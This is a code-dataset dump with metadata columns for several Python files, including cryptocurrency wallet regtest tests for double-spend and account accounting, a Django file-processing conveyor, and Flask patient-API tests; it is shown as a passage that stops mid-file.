hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 958k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f72ea474aea803c8551d2dd9a3d642ba5bdfa8bf | 6,529 | py | Python | qa/rpc-tests/txn_doublespend.py | mirzaei-ce/core-outbit | 3ebf7d8f398fa564c593433f7808d0a1d35809b9 | [
"MIT"
] | null | null | null | qa/rpc-tests/txn_doublespend.py | mirzaei-ce/core-outbit | 3ebf7d8f398fa564c593433f7808d0a1d35809b9 | [
"MIT"
] | null | null | null | qa/rpc-tests/txn_doublespend.py | mirzaei-ce/core-outbit | 3ebf7d8f398fa564c593433f7808d0a1d35809b9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with a double-spend conflict
#
from test_framework.test_framework import OutbitTestFramework
from test_framework.util import *
class TxnMallTest(OutbitTestFramework):
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 UBT:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# First: use raw transaction API to send 1240 UBT to node1_address,
# but don't broadcast:
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 1219)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = 1240
outputs[change_address] = 1248 - 1240 + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransaction(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 UBT coin each
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50UBT for another
# matured block, minus 40, minus 20, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219+tx1["amount"]+tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29+tx2["amount"]+tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100UBT for
# two more matured blocks, minus 1240 for the double-spend, plus fees (which are
# negative):
expected = starting_balance + 100 - 1240 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
# Final "" balance is starting_balance - amount moved to accounts - doublespend + subsidies +
# fees (which are negative)
assert_equal(self.nodes[0].getbalance("foo"), 1219)
assert_equal(self.nodes[0].getbalance("bar"), 29)
assert_equal(self.nodes[0].getbalance(""), starting_balance
-1219
- 29
-1240
+ 100
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
# Node1's "from0" account balance should be just the doublespend:
assert_equal(self.nodes[1].getbalance("from0"), 1240)
if __name__ == '__main__':
TxnMallTest().main()
| 45.657343 | 111 | 0.606065 |
from test_framework.test_framework import OutbitTestFramework
from test_framework.util import *
class TxnMallTest(OutbitTestFramework):
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("")
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
node1_address = self.nodes[1].getnewaddress("from0")
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 1219)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = 1240
outputs[change_address] = 1248 - 1240 + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransaction(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends using 1 50 UBT coin each
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50UBT for another
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("foo", 0), 1219+tx1["amount"]+tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29+tx2["amount"]+tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"]+tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100UBT for
expected = starting_balance + 100 - 1240 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*"), expected)
assert_equal(self.nodes[0].getbalance("foo"), 1219)
assert_equal(self.nodes[0].getbalance("bar"), 29)
assert_equal(self.nodes[0].getbalance(""), starting_balance
-1219
- 29
-1240
+ 100
+ fund_foo_tx["fee"]
+ fund_bar_tx["fee"]
+ doublespend_fee)
assert_equal(self.nodes[1].getbalance("from0"), 1240)
if __name__ == '__main__':
TxnMallTest().main()
| true | true |
f72ea519259a797fa9330cd2c0f999cf42083662 | 3,975 | py | Python | diverse/conveyor.py | sakkada/django-diverse | dbd13bb13c3663d6149a28d94daaf06c1e47b0f4 | [
"MIT"
] | null | null | null | diverse/conveyor.py | sakkada/django-diverse | dbd13bb13c3663d6149a28d94daaf06c1e47b0f4 | [
"MIT"
] | null | null | null | diverse/conveyor.py | sakkada/django-diverse | dbd13bb13c3663d6149a28d94daaf06c1e47b0f4 | [
"MIT"
] | null | null | null | import os
import time
import shutil
import hashlib
import mimetypes
from django.core.files.storage import FileSystemStorage
from . import settings
class VersionGenerationError(Exception):
pass
class Conveyor(object):
# convention: storage should operate files on local filesystem
# to allow processors use system file operation functions
storage_allowed = (FileSystemStorage,)
storage = None
def __init__(self, *args, **kwargs):
if not self.storage or not isinstance(self.storage,
self.storage_allowed):
raise ValueError('Conveyor storage should'
' be in storage_allowed (local fs).')
def run(self, filever, force=False):
raise NotImplementedError
class TempFileConveyor(Conveyor):
def __init__(self, *args, **kwargs):
self.storage = FileSystemStorage(location=settings.TEMPORARY_DIR)
super(TempFileConveyor, self).__init__(*args, **kwargs)
def run(self, filever, force=False):
source_file = filever.source_file
dest_storage = filever.storage()
replace_mode = False
# check self processing (equality of source and destination)
if dest_storage.path(filever.path) == dest_storage.path(
source_file.path) and filever.attrname == 'self':
replace_mode = True
# check file existance and force
if not replace_mode and dest_storage.exists(filever.path):
if not force:
return
dest_storage.delete(filever.path)
# open (rb mode) source file
source_closed = source_file.closed
source_closed and source_file.open()
# get hasher
md5hash = hashlib.md5()
md5hash.update('{}@{}'.format(source_file.name,
time.time()).encode('utf-8', 'ignore'))
# create temporary file and get mimetype
tempname = os.path.splitext(source_file.name)
tempname = '%s%s' % (md5hash.hexdigest(), tempname[1])
tempname = self.storage.save(tempname, source_file)
mimetype = mimetypes.guess_type(tempname)
# close source
source_closed and source_file.close()
# safe processors call and close source
status = True
try:
# run processors conveyor
for processor in filever.processors():
tempname, mimetype = processor.run(tempname, mimetype,
self.storage, filever)
if not tempname:
break
except Exception as e:
status = False
# alter default exception message
message = ('File version "%s" generation error for "%s" at %s.'
' Real reason is: %%s'
% (filever.attrname,
source_file.name, processor.__class__))
e.args = tuple([message % e.args[0]] + list(e.args[1:]))
raise
else:
if status:
# save target file with destination storage
# todo: check new filename correctness
if replace_mode:
dest_storage.delete(filever.path)
with self.storage.open(tempname) as tempfile:
dest_storage.save(filever.path, tempfile)
finally:
# delete temporary
# warning: delete is unsafe with locks (especially write mode locks)
# that means that each processor have to be extremally
# safety with opened file pointers
self.storage.delete(tempname)
if not status:
status = ('File version "%s" generation error for "%s" at %s.'
% (filever.attrname,
source_file.name, processor.__class__))
raise VersionGenerationError(status)
| 37.149533 | 80 | 0.580881 | import os
import time
import shutil
import hashlib
import mimetypes
from django.core.files.storage import FileSystemStorage
from . import settings
class VersionGenerationError(Exception):
pass
class Conveyor(object):
storage_allowed = (FileSystemStorage,)
storage = None
def __init__(self, *args, **kwargs):
if not self.storage or not isinstance(self.storage,
self.storage_allowed):
raise ValueError('Conveyor storage should'
' be in storage_allowed (local fs).')
def run(self, filever, force=False):
raise NotImplementedError
class TempFileConveyor(Conveyor):
def __init__(self, *args, **kwargs):
self.storage = FileSystemStorage(location=settings.TEMPORARY_DIR)
super(TempFileConveyor, self).__init__(*args, **kwargs)
def run(self, filever, force=False):
source_file = filever.source_file
dest_storage = filever.storage()
replace_mode = False
if dest_storage.path(filever.path) == dest_storage.path(
source_file.path) and filever.attrname == 'self':
replace_mode = True
if not replace_mode and dest_storage.exists(filever.path):
if not force:
return
dest_storage.delete(filever.path)
source_closed = source_file.closed
source_closed and source_file.open()
md5hash = hashlib.md5()
md5hash.update('{}@{}'.format(source_file.name,
time.time()).encode('utf-8', 'ignore'))
tempname = os.path.splitext(source_file.name)
tempname = '%s%s' % (md5hash.hexdigest(), tempname[1])
tempname = self.storage.save(tempname, source_file)
mimetype = mimetypes.guess_type(tempname)
source_closed and source_file.close()
status = True
try:
for processor in filever.processors():
tempname, mimetype = processor.run(tempname, mimetype,
self.storage, filever)
if not tempname:
break
except Exception as e:
status = False
message = ('File version "%s" generation error for "%s" at %s.'
' Real reason is: %%s'
% (filever.attrname,
source_file.name, processor.__class__))
e.args = tuple([message % e.args[0]] + list(e.args[1:]))
raise
else:
if status:
if replace_mode:
dest_storage.delete(filever.path)
with self.storage.open(tempname) as tempfile:
dest_storage.save(filever.path, tempfile)
finally:
self.storage.delete(tempname)
if not status:
status = ('File version "%s" generation error for "%s" at %s.'
% (filever.attrname,
source_file.name, processor.__class__))
raise VersionGenerationError(status)
| true | true |
f72ea553a3dff77429beda1663ea93edb12f2be7 | 56 | py | Python | tests/__init__.py | dougppaz/pyaml_env | 09d3c43da39d5f997ac88b0b7e9945de797eca02 | [
"MIT"
] | 30 | 2021-04-27T15:26:28.000Z | 2022-03-29T17:12:36.000Z | tests/__init__.py | dougppaz/pyaml_env | 09d3c43da39d5f997ac88b0b7e9945de797eca02 | [
"MIT"
] | 12 | 2021-04-28T11:43:15.000Z | 2022-03-03T17:48:17.000Z | tests/__init__.py | dougppaz/pyaml_env | 09d3c43da39d5f997ac88b0b7e9945de797eca02 | [
"MIT"
] | 10 | 2021-04-29T00:31:08.000Z | 2022-03-14T13:49:54.000Z | import os
import sys
sys.path.insert(0, (os.getcwd()))
| 11.2 | 33 | 0.696429 | import os
import sys
sys.path.insert(0, (os.getcwd()))
| true | true |
f72ea6730b4f2126d264157f36867ba7c80f59b1 | 8,491 | py | Python | test/functional/wallet_accounts.py | ALQO-GitHub-Official/new-chain | b993c07397f91860311e2f9e207cb84fdd3a3ffa | [
"MIT"
] | 110 | 2019-07-12T11:46:31.000Z | 2022-02-18T19:47:23.000Z | test/functional/wallet_accounts.py | ALQO-GitHub-Official/new-chain | b993c07397f91860311e2f9e207cb84fdd3a3ffa | [
"MIT"
] | 29 | 2018-10-23T21:28:56.000Z | 2021-02-10T14:42:59.000Z | test/functional/wallet_accounts.py | ALQO-GitHub-Official/new-chain | b993c07397f91860311e2f9e207cb84fdd3a3ffa | [
"MIT"
] | 55 | 2018-10-20T13:40:39.000Z | 2022-03-07T07:13:02.000Z | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0]
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 500)
# there should be 2 address groups
# each with 1 address with a balance of 50 Bitcoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
#for address_group in address_groups:
# assert_equal(len(address_group), 1)
# assert_equal(len(address_group[0]), 2)
# assert_equal(address_group[0][1], 250)
# linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
node.settxfee(0)
common_address = "y9B3dwrBGGs3yVkyEHm68Yn36Wp2Rt7Vtd"
txid = node.sendmany("", {common_address: 100}, 1)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
#address_groups = node.listaddressgroupings()
#assert_equal(len(address_groups), 1)
#assert_equal(len(address_groups[0]), 1)
#assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
#assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
node.sendfrom("", common_address, float(fee))
amount_to_send = 5.0
# Create accounts and make sure subsequent account API calls
# recognize the account/address associations.
accounts = [Account(name) for name in ("a", "b", "c", "d", "e")]
for account in accounts:
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
# Send a transaction to each account, and make sure this forces
# getaccountaddress to generate a new receiving address.
for account in accounts:
node.sendtoaddress(account.receive_address, amount_to_send)
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
# Check the amounts received.
node.generate(1)
for account in accounts:
assert_equal(
node.getreceivedbyaddress(account.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbyaccount(account.name), amount_to_send)
# Check that sendfrom account reduces listaccounts balances.
for i, account in enumerate(accounts):
to_account = accounts[(i+1) % len(accounts)]
node.sendfrom(account.name, to_account.receive_address, amount_to_send)
node.generate(1)
for account in accounts:
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
assert_equal(node.getreceivedbyaccount(account.name), 10)
node.move(account.name, "", float(node.getbalance(account.name)))
account.verify(node)
node.generate(101)
#expected_account_balances = {"": 26149.99985650}
#for account in accounts:
# expected_account_balances[account.name] = 0
#assert_equal(node.listaccounts(), expected_account_balances)
#assert_equal(node.getbalance(""), 26149.99985650)
# Check that setaccount can assign an account to a new unused address.
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account.name)
account.add_address(address)
account.verify(node)
assert(address not in node.getaddressesbyaccount(""))
# Check that addmultisigaddress can assign accounts.
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account.name)
account.add_address(multisig_address)
account.verify(node)
node.sendfrom("", multisig_address, 50)
#node.generate(101)
#for account in accounts:
# assert_equal(node.getbalance(account.name), 50)
# Check that setaccount can change the account of an address from a
# different account.
change_account(node, accounts[0].addresses[0], accounts[0], accounts[1])
# Check that setaccount can change the account of an address which
# is the receiving address of a different account.
change_account(node, accounts[0].receive_address, accounts[0], accounts[1])
# Check that setaccount can set the account of an address already
# in the account. This is a no-op.
change_account(node, accounts[2].addresses[0], accounts[2], accounts[2])
# Check that setaccount can set the account of an address which is
# already the receiving address of the account. It would probably make
# sense for this to be a no-op, but right now it resets the receiving
# address, causing getaccountaddress to return a brand new address.
change_account(node, accounts[2].receive_address, accounts[2], accounts[2])
class Account:
def __init__(self, name):
# Account name
self.name = name
# Current receiving address associated with this account.
self.receive_address = None
# List of all addresses assigned with this account
self.addresses = []
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
self.receive_address = address
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
assert_equal(node.getaccountaddress(self.name), self.receive_address)
for address in self.addresses:
assert_equal(node.getaccount(address), self.name)
assert_equal(
set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_account(node, address, old_account, new_account):
assert_equal(address in old_account.addresses, True)
node.setaccount(address, new_account.name)
old_account.addresses.remove(address)
new_account.add_address(address)
# Calling setaccount on an address which was previously the receiving
# address of a different account should reset the receiving address of
# the old account, causing getaccountaddress to return a brand new
# address.
if address == old_account.receive_address:
new_address = node.getaccountaddress(old_account.name)
assert_equal(new_address not in old_account.addresses, True)
assert_equal(new_address not in new_account.addresses, True)
old_account.add_receive_address(new_address)
old_account.verify(node)
new_account.verify(node)
if __name__ == '__main__':
WalletAccountsTest().main()
| 41.827586 | 83 | 0.668119 |
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0]
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 500)
# there should be 2 address groups
# each with 1 address with a balance of 50 Bitcoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
# the addresses aren't linked now, but will be after we send to the
linked_addresses = set()
# matures.
node.settxfee(0)
common_address = "y9B3dwrBGGs3yVkyEHm68Yn36Wp2Rt7Vtd"
txid = node.sendmany("", {common_address: 100}, 1)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
#address_groups = node.listaddressgroupings()
#assert_equal(len(address_groups), 1)
#assert_equal(len(address_groups[0]), 1)
#assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
#assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
node.sendfrom("", common_address, float(fee))
amount_to_send = 5.0
accounts = [Account(name) for name in ("a", "b", "c", "d", "e")]
for account in accounts:
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
for account in accounts:
node.sendtoaddress(account.receive_address, amount_to_send)
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
node.generate(1)
for account in accounts:
assert_equal(
node.getreceivedbyaddress(account.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbyaccount(account.name), amount_to_send)
for i, account in enumerate(accounts):
to_account = accounts[(i+1) % len(accounts)]
node.sendfrom(account.name, to_account.receive_address, amount_to_send)
node.generate(1)
for account in accounts:
account.add_receive_address(node.getaccountaddress(account.name))
account.verify(node)
assert_equal(node.getreceivedbyaccount(account.name), 10)
node.move(account.name, "", float(node.getbalance(account.name)))
account.verify(node)
node.generate(101)
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account.name)
account.add_address(address)
account.verify(node)
assert(address not in node.getaddressesbyaccount(""))
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account.name)
account.add_address(multisig_address)
account.verify(node)
node.sendfrom("", multisig_address, 50)
change_account(node, accounts[0].addresses[0], accounts[0], accounts[1])
change_account(node, accounts[0].receive_address, accounts[0], accounts[1])
change_account(node, accounts[2].addresses[0], accounts[2], accounts[2])
change_account(node, accounts[2].receive_address, accounts[2], accounts[2])
class Account:
def __init__(self, name):
self.name = name
self.receive_address = None
self.addresses = []
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
self.receive_address = address
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
assert_equal(node.getaccountaddress(self.name), self.receive_address)
for address in self.addresses:
assert_equal(node.getaccount(address), self.name)
assert_equal(
set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_account(node, address, old_account, new_account):
assert_equal(address in old_account.addresses, True)
node.setaccount(address, new_account.name)
old_account.addresses.remove(address)
new_account.add_address(address)
if address == old_account.receive_address:
new_address = node.getaccountaddress(old_account.name)
assert_equal(new_address not in old_account.addresses, True)
assert_equal(new_address not in new_account.addresses, True)
old_account.add_receive_address(new_address)
old_account.verify(node)
new_account.verify(node)
if __name__ == '__main__':
WalletAccountsTest().main()
| true | true |
f72ea7749502804e63cabefce69af2c3762767e4 | 2,268 | py | Python | server/tests/test_patients.py | ishitakapoor26/Nutrihelp | 5bac42aaee61884f9ee7415caf441e80b7b03b48 | [
"MIT"
] | 22 | 2021-02-15T10:30:59.000Z | 2022-01-09T07:10:36.000Z | server/tests/test_patients.py | Ayonijakaushik19/Nutrihelp | 85926b187a6bfcf80f1f1cd60667ed3d14dce0be | [
"MIT"
] | 51 | 2021-02-27T15:42:15.000Z | 2022-03-01T15:02:03.000Z | server/tests/test_patients.py | Ayonijakaushik19/Nutrihelp | 85926b187a6bfcf80f1f1cd60667ed3d14dce0be | [
"MIT"
] | 25 | 2021-02-14T17:49:23.000Z | 2022-02-27T18:27:39.000Z | from bson.json_util import dumps
from ..app import app
from json import dumps as pretty
class glo:
patient_id = []
g = glo()
userid = ['1k33224', '60961d77a7090edb5b69c62c']
patient = {
'name': 'Abhishek shrivastava',
'age': 19,
'gender': 'M',
'mobile': '9022930339'
}
patient2 = {
'name': 'Avinash',
'age': 39,
'gender': 'M',
'mobile': '2992123212',
'stats': {
'bp': 223,
'glucose': 213,
'weight': 922
}
}
data = [{
'userid': userid[0],
'patient':patient,
},
{
'userid': userid[1],
'patient':patient,
}]
def pprint(data):
print(pretty(data, sort_keys=True, indent=4))
def test_add_patient():
with app.test_client() as client:
for item in data:
uri = '/patients'
res = client.post(uri, json=item)
pprint(res.json)
assert res.status_code == 200
def test_get_all_patients():
with app.test_client() as client:
for id in userid:
res = client.get('/patients/'+id)
pprint(res.json)
if type(res.json) == list:
g.patient_id = [(d.get('id')) for d in res.json]
g.patient_id.append({'$oid': userid[1]})
assert res.status_code == 200
def test_patient_get():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/' + uid+'/'+pid['$oid']
res = client.get(uri)
pprint(res.json)
assert res.status_code == 200
def test_patient_update():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/'+uid+'/'+pid['$oid']
res = client.put(uri, json=patient2)
pprint(res.json)
assert res.status_code == 200
def test_patient_delete():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/'+uid+'/'+pid['$oid']
res = client.delete(uri)
pprint(res.json)
assert res.status_code == 200
def test_patient_get_after_delete():
test_patient_get()
| 23.142857 | 64 | 0.53351 | from bson.json_util import dumps
from ..app import app
from json import dumps as pretty
class glo:
patient_id = []
g = glo()
userid = ['1k33224', '60961d77a7090edb5b69c62c']
patient = {
'name': 'Abhishek shrivastava',
'age': 19,
'gender': 'M',
'mobile': '9022930339'
}
patient2 = {
'name': 'Avinash',
'age': 39,
'gender': 'M',
'mobile': '2992123212',
'stats': {
'bp': 223,
'glucose': 213,
'weight': 922
}
}
data = [{
'userid': userid[0],
'patient':patient,
},
{
'userid': userid[1],
'patient':patient,
}]
def pprint(data):
print(pretty(data, sort_keys=True, indent=4))
def test_add_patient():
with app.test_client() as client:
for item in data:
uri = '/patients'
res = client.post(uri, json=item)
pprint(res.json)
assert res.status_code == 200
def test_get_all_patients():
with app.test_client() as client:
for id in userid:
res = client.get('/patients/'+id)
pprint(res.json)
if type(res.json) == list:
g.patient_id = [(d.get('id')) for d in res.json]
g.patient_id.append({'$oid': userid[1]})
assert res.status_code == 200
def test_patient_get():
with app.test_client() as client:
for uid in userid:
for pid in g.patient_id:
uri = '/patients/' + uid+'/'+pid['$oid']
